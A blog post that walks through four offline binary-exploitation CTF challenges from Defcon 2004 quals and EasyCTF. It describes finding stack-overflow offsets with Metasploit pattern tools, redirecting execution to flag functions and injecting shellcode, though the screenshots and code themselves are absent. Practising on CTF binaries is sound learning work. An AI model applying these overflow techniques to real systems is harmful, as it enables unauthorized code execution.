sobota, 27 maja 2017

Playing offline CTF's

In the middle of time I started some new exercises related to CTF adventures. This time I tried to pass some challenges related to “binarypwn”. Few cases you’ll find described below.

First of all my environment: to solve all of those cases I used Windows 10 with Kali Linux 2.0 on VirtualBox. Challenges to solve I found here. I decided to check them one by one, starting from this archive: /2004/Defcon-Quals/2004-quals.tgz.



Case #01: stage2



Ok, now we will use objdump:



Ok, so now.

I created pattern using pattern_create  tool from Metasploit. Pattern was used as argv[1] in our stage2 application:


Enter. …and we are here:




Let’s find our offset using pattern_offset  from Metasploit again:



Ok, so it looks like our overflow needs 104 characters to appear. Verifying:




Great. Let’s try to go deeper. I found nice (19b) shellcode on exploit-db.com(thanks!). Let’s try to use it in our attack:


So, hm. Yes. Here we are:

:]


Case #02: from Easy CTF 2017

More about Easy CTF you can find here. I found a link to resources (so called ‘problems’) at this location: https://github.com/EasyCTF/easyctf-2017-problems

Like before, I was interested ‘only’ those challenges where we need to exploit some kind of vulnerability.  That’s how I found simple-rop challenge.




Let’s get to work. For my testing/learning purposes I created ‘flag.txt’ file on the same directory when simple-rop.c was compiled:



 Ok, flag.txt is ready, app is compiled but comparing some results from objdump and gdb, you will spot one missing line:




Let’s try to complete the task. Idea here is to ‘read the flag’. Let’s disassemble print_flag in gdb:




Generating pattern (pattern_create 100) we will try to overflow our buffer (we know from the source that this is 64b long buff char). Trying:



Ok, crashed. After a while we will see that the best offset should be 76*A+print_flag-addr. Let’s try it:




Cool. ;]
Next.



Case#03: doubly-dangerous : also from EasyCTF 2017:

This was a little surprise for me when I saw in asmcode instruction fxch (afaik possibly some other variants too) instruction ;] anyway... let's try it:




As we can read on the link:

 


Ok. As you can see our goal is to get modified equal to 11.28125, see line 39:



(...) 39    if (modified == 11.28125) {

…then we will run give_flag() function (and hopefully our modified shell). Let’s get to work. During next step we can see that our content is almost ready:






After we will continue:






Now: because we know that we need to compare those two ‘strings’ (st1, st2) we can also check the value we need to compare to:



So far so good. Playing a little bit with lengths and:
 
…and we’re here:

Ok.


Case#04: overflow1.c from EasyCTF 2014:
 
 
I copied my flag.txt from EasyCTF 2017 (case#03 before). Now it looks like this:



I assume that we need 0xc0deface as secret value. Then we will run a shell. Let’s try:

Ok, looks cool. Assuming that we know how to set up our shellcode, we can now proceed with the new shell:

See you next time ;]
Cheers.




Brak komentarzy:

Prześlij komentarz